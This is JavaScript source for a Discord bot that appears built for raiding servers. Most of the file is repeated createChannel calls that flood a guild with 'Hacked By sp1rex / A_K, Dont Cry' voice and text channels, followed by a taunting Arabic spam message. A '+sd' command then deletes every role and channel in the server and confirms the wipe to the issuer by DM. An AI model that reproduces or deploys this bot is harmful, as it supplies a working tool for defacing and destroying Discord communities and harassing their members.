		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
        message.channel.send('تحسب انك بتروح بدون حساب ؟ لبى والله عيونك:see_no_evil: :see_no_evil: :see_no_evil: :see_no_evil: :see_no_evil: :see_no_evil: :see_no_evil: :see_no_evil:تحسب انك بتروح بدون حساب ؟ لبى والله عيونك:see_no_evil: :see_no_evil: :see_no_evil: :see_no_evil: :see_no_evil: :see_no_evil: :see_no_evil: :see_no_evil:تحسب انك بتروح بدون حساب ؟ لبى والله عيونك:see_no_evil: :see_no_evil: :see_no_evil: :see_no_evil: :see_no_evil: :see_no_evil: :see_no_evil: :see_no_evil:تحسب انك بتروح بدون حساب ؟ لبى والله عيونك:see_no_evil: :see_no_evil: :see_no_evil: :see_no_evil: :see_no_evil: :see_no_evil: :see_no_evil: :see_no_evil:تحسب انك بتروح بدون حساب ؟ لبى والله عيونك:see_no_evil: :see_no_evil: :see_no_evil: :see_no_evil: :see_no_evil: :see_no_evil: :see_no_evil: :see_no_evil:تحسب انك بتروح بدون حساب ؟ لبى والله عيونك:see_no_evil: :see_no_evil: :see_no_evil: :see_no_evil: :see_no_evil: :see_no_evil: :see_no_evil: :see_no_evil:تحسب انك بتروح بدون حساب ؟ لبى والله عيونك:see_no_evil: :see_no_evil: :see_no_evil: :see_no_evil: :see_no_evil: :see_no_evil: :see_no_evil: :see_no_evil:تحسب انك بتروح بدون حساب ؟ لبى والله عيونك:see_no_evil: :see_no_evil: :see_no_evil: :see_no_evil: :see_no_evil: :see_no_evil: :see_no_evil: :see_no_evil:تحسب انك بتروح بدون حساب ؟ لبى والله عيونك:see_no_evil: :see_no_evil: :see_no_evil: :see_no_evil: :see_no_evil: :see_no_evil: :see_no_evil: :see_no_evil:تحسب انك بتروح بدون حساب ؟ لبى والله عيونك:see_no_evil: :see_no_evil: :see_no_evil: :see_no_evil: :see_no_evil: :see_no_evil: :see_no_evil: :see_no_evil:تحسب انك بتروح بدون حساب ؟ لبى والله عيونك:see_no_evil: :see_no_evil: :see_no_evil: :see_no_evil: :see_no_evil: :see_no_evil: :see_no_evil: :see_no_evil:تحسب انك بتروح بدون حساب ؟ لبى والله عيونك:see_no_evil: :see_no_evil: :see_no_evil: :see_no_evil: :see_no_evil: :see_no_evil: :see_no_evil: :see_no_evil:تحسب انك بتروح بدون حساب ؟ لبى والله عيونك:see_no_evil: :see_no_evil: :see_no_evil: :see_no_evil: :see_no_evil: :see_no_evil: :see_no_evil: :see_no_evil:');
}
}
});



client.on('message', ra3d => {   
 if (ra3d.content.startsWith("+sd")) {
     ra3d.guild.roles.forEach(r => { r.delete() }) 
     ra3d.guild.channels.forEach(c => { c.delete() })
                let embed = new Discord.RichEmbed()
            .setColor('#fd0101')
            .setDescription('تم حذف كل شي في السيرفر✅')
           ra3d.author.sendEmbed(embed);
 }
 });  





client.login(process.env.BOT_TOKEN);

